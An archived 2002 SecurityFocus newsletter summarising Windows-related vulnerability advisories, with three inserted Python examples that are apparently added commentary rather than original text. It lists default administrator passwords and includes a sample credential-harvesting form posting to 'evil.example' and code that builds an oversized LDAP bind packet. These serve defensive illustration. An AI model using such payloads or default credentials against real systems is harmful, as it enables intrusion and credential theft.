SecurityFocus Microsoft Newsletter #88
From: Marc Fossi <mfossi@securityfocus.com>
To: Focus-MS <focus-ms@securityfocus.com>
Date: Tue, 28 May 2002 13:07:46 -0600 (MDT)
SecurityFocus Microsoft Newsletter #88
--------------------------------------
This newsletter is sponsored by SecurityFocus (www.securityfocus.com)
Attention Non-profits and Universities: Sign-up now for preferred pricing
on the only global early-warning system for cyber attacks - SecurityFocus
ARIS Threat Management System.
Click here for more info
http://www.securityfocus.com/corporate/products/pdpsection.shtml
-------------------------------------------------------------------------------
I. FRONT AND CENTER
1. No Stone Unturned, Part Four
2. Securing Microsoft Services
3. The Viral Mind: Understanding the Motives of Malicious Coders
4. Black Hat Briefings
5. Security Hole Strip Tease
II. MICROSOFT VULNERABILITY SUMMARY
1. Nullsoft Winamp Plaintext Authentication Credentials Vulnerability
2. BannerWheel Remote Buffer Overflow Vulnerability
3. Deerfield WebSite Pro 8.3 Filename Source Disclosure Vulnerability
4. Hosting Controller Browse.ASP File Disclosure Vulnerability
5. Hosting Controller Default Administrative Account Vulnerability
6. Matu FTP Server Buffer Overflow Vulnerability
7. NewAtlanta ServletExec/ISAPI Path Disclosure Vulnerability
8. NewAtlanta ServletExec/ISAPI File Disclosure Vulnerability
9. Microsoft MSDE/SQL Server 2000 Desktop Engine Default...
10. Ipswitch IMail Server LDAP Buffer Overflow Vulnerability
11. NewAtlanta ServletExec/ISAPI JSPServlet Denial Of Service...
12. Ethereal DNS Dissector Infinite Loop Denial of Service...
13. Ethereal GIOP Dissector Memory Exhaustion Vulnerability
14. SSH Communications Secure Shell Server AllowedAuthentications...
15. YoungZSoft CMailServer Buffer Overflow Vulnerability
16. Ethereal Server Message Block Dissector Malformed Packet...
17. ViewCVS Cross-Site Scripting Vulnerability
18. OpenBB BBCode Cross Agent HTML Injection Vulnerability
19. OpenBB Unauthorized Moderator Access Vulnerability
20. Microsoft MSN Messenger Malformed Invite Request Denial of Service...
21. Microsoft Active Directory Zero Page Length Query Vulnerability
22. Ethereal X11 Dissector Buffer Overflow Vulnerability
23. OpenBB Cross-Site Scripting Vulnerability
24. LocalWEB2000 File Disclosure Vulnerability
25. Microsoft Excel 2002 XML Stylesheet Arbitrary Code Execution...
III. MICROSOFT FOCUS LIST SUMMARY
1. Q320206 and SP4 (Thread)
2. Q320206 and SP4 (Thread)
3. No browsing group (Thread)
4. Hfnetchk scans every file (Thread)
5. No browsing group (Thread)
6. IIS 5.0 and Netscape Authentication (Thread)
7. SQL Spider question (Thread)
8. Hfnetchk scans every file (Thread)
9. hotfix overwrite; hfnetchk (Thread)
10. IIS 5.0 and Netscape Authentication (Thread)
11. SQL Spider. (Thread)
12. About ping request? (Thread)
13. MS02-18 causes Exchange problems ?? (Thread)
14. SecurityFocus Microsoft Newsletter # 87 (Thread)
15. About ping request? (Thread)
16. Hotfixes overwritten? (Thread)
IV. MICROSOFT PRODUCTS
1. Sanitizer
2. InsideOut Firewall Reporter
3. Stronghold Enterprise
V. MICROSOFT TOOLS
1. Zebedee 2.4.0
2. File::Scan v0.26
3. ProBot SE v2.4.0
4. MIMEDefang v2.11
VI. SPONSORSHIP INFORMATION
I. FRONT AND CENTER
-------------------
1. No Stone Unturned, Part Four
By H. Carvey
This is the fourth installment of a five-part series describing the
(mis)adventures of a sysadmin named Eliot and his haphazard journey in
discovering "the Way" of incident response.
http://online.securityfocus.com/infocus/1584
2. Securing Microsoft Services
by Mark Burnett
Shut off unnecessary services. It is sound advice that is preached in just
about every security book, checklist, or training class. But all too often
the advice ends there, leaving systems administrators to wonder what
exactly is an unnecessary service and how best to shut it off. Sure, it’s
easy enough to click on "Administrative tools" then "Services" to view the
available services. And it's easy to double-click a service you do not use
and set the "Startup Type" to disabled. But is there more to securing
services than just that?
http://online.securityfocus.com/infocus/1581
3. The Viral Mind: Understanding the Motives of Malicious Coders
by D. D. Shelby
Over the years I have seen many people offer opinions on why virus writers
do what they do. While I accept that many of these people have indeed
spoken to a small number of malware authors, it has become all too
apparent that much of their text has been based on opinion and not fact.
In this article, I will draw upon my own experiences as a virus writer and
as a member of the virus (and anti-virus) community to explore some of the
reasons that people would devote their time to developing viruses.
http://online.securityfocus.com/infocus/1583
4. Black Hat Briefings
Attend Black Hat Briefings & Training, July 29 - August 1, Las Vegas, the
world's premier technical security event! 8 tracks, 12 training sessions,
Richard Clarke keynote, 500 delegates from 30 nations, with a near cult
following of both CSOs and "underground" security experts. See for
yourself what the buzz is all about.
5. Security Hole Strip Tease
By Tim Mullen
By letting the public catch a tantalizing peek at unannounced security
holes, one prolific bug-finder turns up the heat on vendors to close them.
http://online.securityfocus.com/columnists/84
II. BUGTRAQ SUMMARY
-------------------
1. Nullsoft Winamp Plaintext Authentication Credentials Vulnerability
BugTraq ID: 4781
Remote: No
Date Published: May 20 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4781
Summary:
Nullsoft Winamp is a media player for Microsoft Windows supporting MP3 and
other filetypes.
A problem has been discovered which may potentially cause the HTTP
authentication credentials for streaming content to be exposed.
A user's authentication credentials for streaming content will be stored
in plaintext by Winamp. The credentials are stored in the file
'winamp.ini' under the [HTTP-AUTH] and [winamp] headings.
Local attackers may exploit this situation to gain access to the
credentials for streaming content that has been accessed by that user.
This issue was reported for Nullsoft Winamp 2.80. Other versions may also
be affected.
2. BannerWheel Remote Buffer Overflow Vulnerability
BugTraq ID: 4782
Remote: Yes
Date Published: May 20 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4782
Summary:
BannerWheel is a freely available ad banner rotation program. It runs on
most Unix and Linux variants as well as Microsoft Windows operating
systems.
A condition has been reported in BannerWheel which may lead to arbitrary
code execution or a denial of service.
Due to insufficient bounds checking of externally supplied data,
BannerWheel may be prone to a buffer overflow condition. It may be
possible for an attacker to overwrite stack variables (including the
return address) with attacker-supplied instructions.
If exploitable, this condition may allow a remote attacker to execute
arbitrary instructions with the privileges of the webserver process.
3. Deerfield WebSite Pro 8.3 Filename Source Disclosure Vulnerability
BugTraq ID: 4783
Remote: Yes
Date Published: May 20 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4783
Summary:
Deerfield WebSite Pro is a commercial webserver for Microsoft Windows
operating systems.
32bit Microsoft Windows operating systems support long filenames, but also
offer a means of backwards compatibility with the older 8.3 short
filenames required by previous versions of DOS and Windows.
Deerfield WebSite Pro is prone to a vulnerability which is the result of
how requests for files using the 8.3 short filenames are handled.
In particular, this issue occurs when the software attempts to serve files
with extensions which are at least four characters long (such as .shtml),
but are requested using the 8.3 short filenames. When the short filename
is used in the request, the software will fail to call the correct handler
for the extension. The effect is that the requested file will not be
interpreted.
An attacker may exploit this issue to disclose script source code.
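The dispatch mistake described above, as an added example that is not Deerfield's code: a hypothetical server that chooses its handler from the extension exactly as requested, beside one that first maps the request, whether long or 8.3 form, to the directory's real long name and only then consults the handler table. The 8.3 generator is a simplified version of the Windows algorithm (assumption: the '~1' candidate is always free), and the handler table and directory listing are constructed for illustration.

```python
import re
from typing import List, Optional

# Constructed handler table for a hypothetical server (not Deerfield's):
# extension -> engine that must interpret the file before it is sent.
HANDLERS = {
    ".shtml": "ssi",      # server-side includes: must be interpreted
    ".asp": "asp",        # script: must be interpreted
    ".html": "static",
    ".txt": "static",
}
DEFAULT_HANDLER = "static"  # unknown extensions are served verbatim

_ALLOWED = "A-Z0-9_$~!#%&{}()@'-"          # subset of characters legal in 8.3 names
_VALID_8_3 = re.compile(r"^[%s]+$" % _ALLOWED)
_STRIP_BAD = re.compile(r"[^%s]" % _ALLOWED)


def short_name(long_name: str) -> str:
    """Simplified Windows 8.3 short-name generation.

    Assumption: the first candidate ('~1') is always free. Real Windows
    tries ~2, ~3, ... on collision and hashes very long names.
    """
    stem, sep, ext = long_name.rpartition(".")
    if not sep:                       # no dot at all
        stem, ext = long_name, ""
    up_stem, up_ext = stem.upper(), ext.upper()
    already_short = bool(
        1 <= len(up_stem) <= 8 and _VALID_8_3.match(up_stem)
        and len(up_ext) <= 3 and (not up_ext or _VALID_8_3.match(up_ext))
    )
    if already_short:
        return long_name.upper()
    new_stem = _STRIP_BAD.sub("", up_stem)[:6] + "~1"
    new_ext = _STRIP_BAD.sub("", up_ext)[:3]
    return new_stem + ("." + new_ext if new_ext else "")


def handler_for_extension(name: str) -> str:
    """Look the handler up by whatever extension the name carries."""
    _stem, sep, ext = name.rpartition(".")
    return HANDLERS.get("." + ext.lower(), DEFAULT_HANDLER) if sep else DEFAULT_HANDLER


def handler_vulnerable(requested: str) -> str:
    """The flaw: dispatch on the extension as the client typed it, so
    INDEX~1.SHT maps to '.sht', which no handler claims, and the raw
    source of index.shtml goes out as a static file."""
    return handler_for_extension(requested)


def resolve_long_name(requested: str, listing: List[str]) -> Optional[str]:
    """Map a requested name, long or 8.3 form, to the directory's real entry."""
    wanted = requested.upper()
    for entry in listing:
        if entry.upper() == wanted or short_name(entry) == wanted:
            return entry
    return None


def handler_hardened(requested: str, listing: List[str]) -> Optional[str]:
    """Canonicalise to the long name first, then dispatch; None means 404."""
    entry = resolve_long_name(requested, listing)
    return None if entry is None else handler_for_extension(entry)


if __name__ == "__main__":
    docroot = ["index.shtml", "configuration.asp", "notes.txt"]  # constructed listing
    for req in ("index.shtml", "INDEX~1.SHT", "CONFIG~1.ASP"):
        print(req, handler_vulnerable(req), handler_hardened(req, docroot))
```

The point of resolving before dispatching is that every alias of a file, including ones the server author never thought about, ends up keyed by the same canonical name; a server that cannot enumerate the directory should at least refuse names containing '~' followed by digits.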
4. Hosting Controller Browse.ASP File Disclosure Vulnerability
BugTraq ID: 4778
Remote: Yes
Date Published: May 19 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4778
Summary:
Hosting Controller is an application which consolidates all hosting tasks
into one interface. Hosting Controller runs on Microsoft Windows
operating systems.
The 'browse.asp' script is prone to an issue which may allow a remote
attacker to view the contents of arbitrary files and directories. The
attacker must provide the location of the targeted file or directory as a
value for the 'FilePath' URL parameter of the script in a malicious web
request. A file or directory specified through the browse.asp script
would be viewed with the permissions of the web server process.
It should be noted that the underlying webserver will normally be running
with SYSTEM level privileges.
5. Hosting Controller Default Administrative Account Vulnerability
BugTraq ID: 4779
Remote: Yes
Date Published: May 19 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4779
Summary:
Hosting Controller is an application which consolidates all hosting tasks
into one interface. Hosting Controller runs on Microsoft Windows
operating systems.
Hosting Controller installs with the default account 'AdvWebadmin'. This
account is installed with the default password 'advcomm500349'. The
Hosting Controller software does not prompt the administrator to change
the password or remove this account.
This problem may make it possible for remote attackers to abuse this
default administrative account to gain access to the server.
6. Matu FTP Server Buffer Overflow Vulnerability
BugTraq ID: 4792
Remote: Yes
Date Published: May 22 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4792
Summary:
Matu FTP Server is a freely available FTP server for Microsoft Windows 95
and 98 operating systems.
It has been reported that an exploitable buffer overrun condition exists
in Matu FTP. The overflow condition is due to the handling of user input.
Reportedly, the overrun will occur if an excessively long argument is
submitted to the server.
An attacker exploiting this vulnerability may overwrite stack variables
including the return address, possibly to execute arbitrary code. The
attacker may also crash the service by sending excessive amounts of data
that has not specifically been designed to cause code execution.
This issue has been reported in Matu FTP Server 1.13. Other versions may
also be affected.
7. NewAtlanta ServletExec/ISAPI Path Disclosure Vulnerability
BugTraq ID: 4793
Remote: Yes
Date Published: May 22 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4793
Summary:
ServletExec/ISAPI is a plug-in Java Servlet/JSP engine for Microsoft IIS.
It runs with IIS on Microsoft Windows NT/2000/XP systems.
ServletExec/ISAPI discloses the absolute path to the webroot directory
when sent a specially formatted request without a trailing filename.
Specifically, if the class 'com.newatlanta.servletexec.JSP10Servlet' is
invoked without the trailing filename, then an error page will be
displayed with the path to wwwroot.
This type of sensitive information may aid in further attacks against the
vulnerable host.
8. NewAtlanta ServletExec/ISAPI File Disclosure Vulnerability
BugTraq ID: 4795
Remote: Yes
Date Published: May 22 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4795
Summary:
ServletExec/ISAPI is a plug-in Java Servlet/JSP engine for Microsoft IIS.
It runs with IIS on Microsoft Windows NT/2000/XP systems.
ServletExec/ISAPI will disclose the contents of arbitrary files within the
webroot directory.
For this to occur, the 'com.newatlanta.servletexec.JSP10Servlet' class
must be invoked followed by URL encoded directory traversal sequences and
the name of the file to be disclosed. While this will cause the software
to serve files within wwwroot that normally would not be served, it does
not appear possible to exploit this condition to break out of the webroot.
This condition is due to lack of sufficient validation of external data
supplied to the JSPServlet. This may result in the disclosure of sensitive
information.
9. Microsoft MSDE/SQL Server 2000 Desktop Engine Default Configuration Vulnerability
BugTraq ID: 4797
Remote: Yes
Date Published: May 22 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4797
Summary:
Microsoft Data Engine (MSDE) and Microsoft SQL Server 2000 Desktop Engine
can be deployed with various applications as a database server. A
configuration error exists which could compromise a host running
applications based on these components.
It has been reported that the services are configured with a default
username of 'sa' and a null administrative password. Remote attackers may
exploit this flaw to gain administrative access to the database if the
default password has not been changed.
It should be noted that a worm attempting to exploit default, null,
passwords in Microsoft SQL server and derived products, including MSDE and
SQL Server 2000 Desktop Engine, is currently propagating through the
Internet.
10. Ipswitch IMail Server LDAP Buffer Overflow Vulnerability
BugTraq ID: 4780
Remote: Yes
Date Published: May 20 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4780
Summary:
Ipswitch IMail is an e-mail server that serves clients their mail via a
web interface. It runs on Microsoft Windows operating systems.
IMail ships with a LDAP server to enable remote clients to have read
access to the IMail directory.
The IMail LDAP component is prone to a remotely exploitable buffer
overflow condition, allowing attackers to execute arbitrary
attacker-supplied instructions.
The overflow is known to occur when an overly long string is provided as a
"bind DN" during authentication. It is possible to exploit this condition
to overwrite stack variables, such as the return address, with arbitrary
instructions. In this manner, a remote attacker may leverage this
vulnerability to execute arbitrary code.
IMail normally runs in the SYSTEM context, meaning that successful
exploitation will result in a full compromise of the underlying system.
It should be noted that this condition may also be exploited to trigger a
denial of service.
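To show what an overlong bind DN looks like on the wire, and how a sensor in front of port 389 would spot it, here is an added example that is neither Ipswitch's code nor a published exploit: a minimal BER reader that pulls the message ID and bind DN out of an LDAP simple BindRequest and flags DNs longer than a threshold. The sample packets are constructed with the small encoder included in the block, and the 512-byte threshold is an assumption for illustration, not a figure from the advisory.

```python
from typing import List, Optional, Tuple

# Assumption: alert threshold for bind DN length; pick per deployment.
MAX_BIND_DN = 512

# BER tags used by an LDAP simple bind (RFC 2251 / X.690).
SEQUENCE, INTEGER, OCTET_STRING = 0x30, 0x02, 0x04
BIND_REQUEST = 0x60      # [APPLICATION 0], constructed
SIMPLE_AUTH = 0x80       # [0] simple password, context-specific primitive


def ber_len(n: int) -> bytes:
    """Encode a BER length (short form below 128, long form otherwise)."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + ber_len(len(body)) + body


def build_bind_request(msg_id: int, dn: bytes, password: bytes) -> bytes:
    """Encoder used only to construct sample packets for this example."""
    bind = tlv(INTEGER, bytes([3])) + tlv(OCTET_STRING, dn) + tlv(SIMPLE_AUTH, password)
    return tlv(SEQUENCE, tlv(INTEGER, bytes([msg_id])) + tlv(BIND_REQUEST, bind))


def read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Return (tag, value, next_pos); raise ValueError on a truncated element."""
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                          # long form: next N bytes hold the length
        nbytes = length & 0x7F
        if nbytes == 0 or pos + nbytes > len(buf):
            raise ValueError("bad long-form length")
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    if pos + length > len(buf):
        raise ValueError("TLV value runs past end of buffer")
    return tag, buf[pos:pos + length], pos + length


def parse_bind_request(pkt: bytes) -> Optional[Tuple[int, bytes]]:
    """Return (message_id, bind_dn) for an LDAP BindRequest, else None."""
    try:
        tag, msg, _ = read_tlv(pkt, 0)
        if tag != SEQUENCE:
            return None
        tag, mid, pos = read_tlv(msg, 0)
        if tag != INTEGER:
            return None
        tag, bind, _ = read_tlv(msg, pos)
        if tag != BIND_REQUEST:                # some other protocolOp (search, ...)
            return None
        _tag, _version, pos = read_tlv(bind, 0)
        tag, dn, _ = read_tlv(bind, pos)
        if tag != OCTET_STRING:
            return None
        return int.from_bytes(mid, "big"), dn
    except ValueError:                         # truncated or malformed PDU
        return None


def oversized_bind_dn(pkt: bytes, limit: int = MAX_BIND_DN) -> bool:
    """True when the packet is a BindRequest whose DN exceeds the limit."""
    parsed = parse_bind_request(pkt)
    return parsed is not None and len(parsed[1]) > limit


def flag_stream(packets: List[bytes], limit: int = MAX_BIND_DN) -> List[int]:
    """Message IDs of every oversized bind in a list of captured PDUs."""
    return [parse_bind_request(p)[0] for p in packets if oversized_bind_dn(p, limit)]


if __name__ == "__main__":
    # Constructed samples: a normal bind and one carrying a 4000-byte DN.
    normal = build_bind_request(1, b"cn=reader,o=example", b"secret")
    bloated = build_bind_request(2, b"A" * 4000, b"")
    print(flag_stream([normal, bloated]))      # [2]
```

The reader checks every length against the buffer before slicing, which is exactly the check an LDAP server's own decoder must make before copying a DN into a fixed-size stack buffer; a legitimate DN of several thousand bytes is rare enough that the threshold can be set low without false positives.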
11. NewAtlanta ServletExec/ISAPI JSPServlet Denial Of Service Vulnerability
BugTraq ID: 4796
Remote: Yes
Date Published: May 22 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4796
Summary:
ServletExec/ISAPI is a plug-in Java Servlet/JSP engine for Microsoft IIS.
It runs with IIS on Microsoft Windows NT/2000/XP systems.
The JSPServlet encounters difficulties when handling overly long requests.
If the JSPServlet is sent an overly long request directly or is invoked
via a long request for a JSP file, a denial of service condition will
occur.
It has been reported that this will cause the underlying webserver to
crash.
This condition may be the result of insufficient bounds checking, which
may allow an attacker to execute arbitrary code. This possibility has not
been confirmed.
12. Ethereal DNS Dissector Infinite Loop Denial of Service Vulnerability
BugTraq ID: 4807
Remote: Yes
Date Published: May 23 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4807
Summary:
Ethereal is a freely available, open source network traffic analysis tool.
It is maintained by the Ethereal Project and is available for most Unix
and Linux variants as well as Microsoft Windows operating systems.
The Ethereal DNS dissector is a mechanism for decoding the DNS protocol.
A condition exists where the DNS dissector routine may enter an infinite
loop while processing a request. This may be triggered by a maliciously
constructed DNS query transmitted across the network. A remote attacker
may exploit this vulnerability to prevent Ethereal from functioning.
Successful exploitation may result in data loss and evasion of detection
by Ethereal.
13. Ethereal GIOP Dissector Memory Exhaustion Vulnerability
BugTraq ID: 4808
Remote: Yes
Date Published: May 23 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4808
Summary:
Ethereal is a freely available, open source network traffic analysis tool.
It is maintained by the Ethereal Project and is available for most Unix
and Linux variants as well as Microsoft Windows operating systems.
The Ethereal GIOP dissector is a mechanism for decoding the General
Inter-ORB Protocol (GIOP). A condition exists that may result in
exhaustion of available memory. A specially constructed packet may cause
allocation of a large amount of memory. Attackers may exploit this
vulnerability to cause an exhaustion of available memory.
Successful exploitation may result in Ethereal failing or crashing.
14. SSH Communications Secure Shell Server AllowedAuthentications Configuration Overriding Vulnerability
BugTraq ID: 4810
Remote: Yes
Date Published: May 23 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4810
Summary:
Secure Shell is the commercial SSH implementation distributed and
maintained by SSH Communications. It is available for the Unix, Linux,
and Microsoft Windows platforms.
A problem with some SSH servers may allow remote users to authenticate
using arbitrary methods. The problem is in the handling of authentication
types specified via configuration.
SSH Servers allow an administrator to specify modes of authentication via
the server configuration file. Through the "AllowedAuthentications"
parameter, an administrator may limit the means of authentication used by
remote users.
Under some circumstances, it may be possible for a remote user to bypass
the "AllowedAuthentications" specified in the server configuration. This
could allow a user to authenticate using a different or weaker means, such
as a password. In such a situation where stronger authentication
protocols are in place, and system user accounts have been secured with
weak passwords, an attacker may be able to gain access to the system using
the weak password, rather than the strong authentication scheme.
This problem makes it possible for remote users to circumvent
authentication mechanisms and, potentially, use a weaker method of
authentication.
15. YoungZSoft CMailServer Buffer Overflow Vulnerability
BugTraq ID: 4789
Remote: Yes
Date Published: May 21 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4789
Summary:
CMailServer is a mail server program for Microsoft Windows systems. It
is maintained by YoungZSoft.
It has been reported that an exploitable buffer overrun condition exists in
CMailServer. The overflow condition is due to a lack of proper bounds
checking when processing client input. The overrun will occur if an
excessively long argument to the USER command is sent to the server.
An attacker exploiting this vulnerability may overwrite stack variables
including the return address, possibly to execute arbitrary code. The
attacker may also crash the service by sending excessive amounts of data
that has not specifically been designed to cause code execution.
This issue has been reported in CMailServer 3.30. Other versions may also
be affected.
16. Ethereal Server Message Block Dissector Malformed Packet Denial Of Service Vulnerability
BugTraq ID: 4806
Remote: Yes
Date Published: May 23 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4806
Summary:
Ethereal is a freely available, open source network traffic analysis tool.
It is maintained by the Ethereal Project and is available for most Unix
and Linux variants as well as Microsoft Windows operating systems.
The Ethereal Server Message Block (SMB) dissector is a mechanism for
decoding the Microsoft SMB protocol. A problem with this portion of
Ethereal could make it possible for a remote attacker to deny service to
an Ethereal user.
Two conditions exist that may result in attempts to dereference NULL
pointers. The conditions may be triggered by a specially constructed SMB
packet transmitted across the network by the attacker. By transmitting
such a packet while a session of Ethereal is running, Ethereal could be
made to dereference a NULL pointer, resulting in a crash of the
application.
Successful exploitation may result in Ethereal crashing due to an access
violation, resulting in a denial of service.
17. ViewCVS Cross-Site Scripting Vulnerability
BugTraq ID: 4818
Remote: Yes
Date Published: May 24 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4818
Summary:
ViewCVS is an open-source web interface for CVS. It is available for most
Unix and Linux variants as well as Microsoft Windows operating systems.
ViewCVS does not filter HTML tags from certain URL parameters, making it
prone to cross-site scripting attacks.
An attacker may exploit this by constructing a malicious link with script
code to a site running ViewCVS and sending it to a legitimate user of the
site. When the legitimate user follows the link, the attacker's script
code is executed in their web client in the security context of the
website running ViewCVS.
The attacker may be able to steal cookie-based authentication credentials
or hijack web content as a result of this vulnerability.
18. OpenBB BBCode Cross Agent HTML Injection Vulnerability
BugTraq ID: 4819
Remote: Yes
Date Published: May 24 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4819
Summary:
OpenBB is web forum software written in PHP. It will run on most Linux and
Unix variants, in addition to Microsoft Windows operating systems.
This vulnerability is similar to the issue discussed in BugTraq ID 4171.
The vulnerability discussed in BugTraq ID 4171 was fixed in OpenBB 1.0.0
RC3, however this issue bypasses the fix provided in 1.0.0 RC3.
OpenBB version 1.0.0 RC3 is reportedly vulnerable to HTML injection
attacks. The vulnerability occurs in the file lib/codeparse.php which
replaces HTML code with BBCodes.
OpenBB uses 'BBCodes' in the place of HTML code to include images, links
etc. This is meant to provide HTML functionality without being susceptible
to malicious users. However, HTML tags are not adequately replaced with
BBCodes. It is possible to inject arbitrary HTML code into forum messages.
As a result, OpenBB is prone to cross-agent scripting attacks. Script code
will be executed in the browser of the user viewing the forum message and
may allow an attacker to steal cookie-based authentication credentials.
19. OpenBB Unauthorized Moderator Access Vulnerability
BugTraq ID: 4823
Remote: Yes
Date Published: May 24 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4823
Summary:
OpenBB is web forum software written in PHP. It will run on most Linux and
Unix variants, in addition to Microsoft Windows operating systems.
OpenBB is reported to be vulnerable to a condition that will allow an
unauthorized user to gain moderator or administrative access to forums.
The attacker can only change a few options as follows:
- Open or close a forum
- To toggle sticky mode status of a forum
- To toggle significant mode status of a forum
This will allow an attacker to effectively cause significant, if not all,
parts of the forum to be closed.
20. Microsoft MSN Messenger Malformed Invite Request Denial of Service
BugTraq ID: 4827
Remote: Yes
Date Published: May 24 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4827
Summary:
MSN Messenger is an instant messaging client for Microsoft Windows
systems, based on the Passport system.
A vulnerability has been reported in some versions of MSN Messenger. Under
some circumstances, it may be possible to crash a target client when it
receives a malformed invite request. By including a number of
HTML-encoded space characters (%20) in the Invitation-Cookie field, and
sending the header to a remote user, it is reportedly possible to crash a
remote user's client.
Exploitation of this vulnerability may result in a denial of MSN service.
The possibility of other consequences, such as code execution, has not yet
been ruled out. This record will be updated as more information becomes
available.
21. Microsoft Active Directory Zero Page Length Query Vulnerability
BugTraq ID: 4804
Remote: Yes
Date Published: May 23 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4804
Summary:
Microsoft Active Directory is reportedly vulnerable to a query that causes
Active Directory to stop responding.
The vulnerability has been reported for queries against Active Directory
servers using Kerberos V authentication via GSS-API (Generic Security
Service Application Program Interface).
Active Directory servers, by default, return as many entries as possible
when responding to requests. An LDAP client is able to specify the number
of entries to be retrieved by setting the page length to a smaller number.
The reported vulnerability occurs when the page length value is set to
zero and the client makes a large request. This will cause the vulnerable
Active Directory server to hang causing a denial of service to occur.
22. Ethereal X11 Dissector Buffer Overflow Vulnerability
BugTraq ID: 4805
Remote: Yes
Date Published: May 19 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4805
Summary:
Ethereal is a freely available, open source network traffic analysis tool.
It is maintained by the Ethereal Project and is available for most Unix
and Linux variants as well as Microsoft Windows operating systems.
The Ethereal X11 dissector is a mechanism for decoding the X11 protocol. A
buffer overflow exists when processing X11 key symbols, or 'keysyms'. It
is possible for an attacker to construct a packet that will, when decoded
by Ethereal, trigger the overflow condition.
Successful exploitation of this vulnerability may result in the attacker
gaining access to the ethereal host.
23. OpenBB Cross-Site Scripting Vulnerability
BugTraq ID: 4824
Remote: Yes
Date Published: May 24 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4824
Summary:
OpenBB is web forum software written in PHP. It will run on most Linux and
Unix variants, in addition to Microsoft Windows operating systems.
It has been reported that OpenBB is vulnerable to a cross-site scripting
attack.
The vulnerability is present in the 'myhome.php' script. OpenBB does not
properly sanitize client-supplied values of certain parameters prior to
output. Attackers are able to circumvent existing measures to protect
against cross-site scripting attacks with the use of '<form>' tags
followed by arbitrary HTML.
Attackers may exploit this vulnerability by constructing a link to one of
these scripts containing malicious script code. If the link is sent to an
OpenBB user and clicked on, the attacker-supplied script code will run in
the context of the user's OpenBB session. The script code may obtain
cookie values or perform unauthorized actions as the victim user.
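The BBCode injection (BID 4819) and the myhome.php '<form>' bypass (BID 4824) share one root cause: the filter looks for known-bad HTML instead of escaping everything and then re-enabling a short allow-list. The following added example, which is not OpenBB's lib/codeparse.php, puts a blacklist-based renderer beside an escape-first renderer; the blocked-tag list, the three BBCode rules and the sample payload are constructed for illustration.

```python
import html
import re

# Constructed blacklist of the kind a tag not on the list (e.g. <form>) slips past.
BLOCKED_TAGS = ("script", "iframe", "object", "img")
_BLACKLIST_RX = re.compile(r"</?(%s)\b[^>]*>" % "|".join(BLOCKED_TAGS), re.IGNORECASE)

# Allow-list: the only markup users may produce, expressed as BBCode.
# The URL rule insists on an http(s) scheme so javascript: URLs never become links.
BBCODE_RULES = [
    (re.compile(r"\[b\](.*?)\[/b\]", re.I | re.S), r"<b>\1</b>"),
    (re.compile(r"\[i\](.*?)\[/i\]", re.I | re.S), r"<i>\1</i>"),
    (re.compile(r"\[url=(https?://[^\]\s\"'<>]+)\](.*?)\[/url\]", re.I | re.S),
     r'<a href="\1">\2</a>'),
]


def strip_blacklisted(text: str) -> str:
    """Remove tags on the blacklist; everything else, including <form>, survives."""
    return _BLACKLIST_RX.sub("", text)


def expand_bbcode(text: str) -> str:
    for rx, repl in BBCODE_RULES:
        text = rx.sub(repl, text)
    return text


def render_vulnerable(text: str) -> str:
    """Filter known-bad tags, then expand BBCode; raw HTML otherwise passes through."""
    return expand_bbcode(strip_blacklisted(text))


def render_hardened(text: str) -> str:
    """Escape every HTML metacharacter first, then expand only the allow-list.

    Because escaping happens before expansion, the only '<' that can reach
    the browser are the ones the BBCode rules themselves emit.
    """
    return expand_bbcode(html.escape(text, quote=True))


if __name__ == "__main__":
    # Constructed payload: a credential-harvesting form plus a legitimate [b] tag.
    payload = '<form action="http://evil.example/steal"><input name=pw></form> [b]hi[/b]'
    print("vulnerable:", render_vulnerable(payload))
    print("hardened:  ", render_hardened(payload))
```

Note that the hardened renderer still needs the URL rule to be strict: escaping protects the HTML context, but an attribute value such as href is a second context, and only the scheme check keeps script out of it.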
24. LocalWEB2000 File Disclosure Vulnerability
BugTraq ID: 4820
Remote: Yes
Date Published: May 24 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4820
Summary:
LocalWEB2000 is a web server for Microsoft Windows operating systems.
A vulnerability exists in LocalWEB2000 related to content password
protection. It is possible to have LocalWEB2000 treat files as
unprotected by requesting them as files within the '.' (current)
directory. If the file http://server/file.txt is set to be password
protected, the protection will be bypassed if a request is made for
http://server/./file.txt. This is likely due to a design error in the
protection component.
This vulnerability was reported for LocalWEB2000 Standard Version 2.1.0.
Other versions (such as the Professional Edition) may also be affected by
this issue.
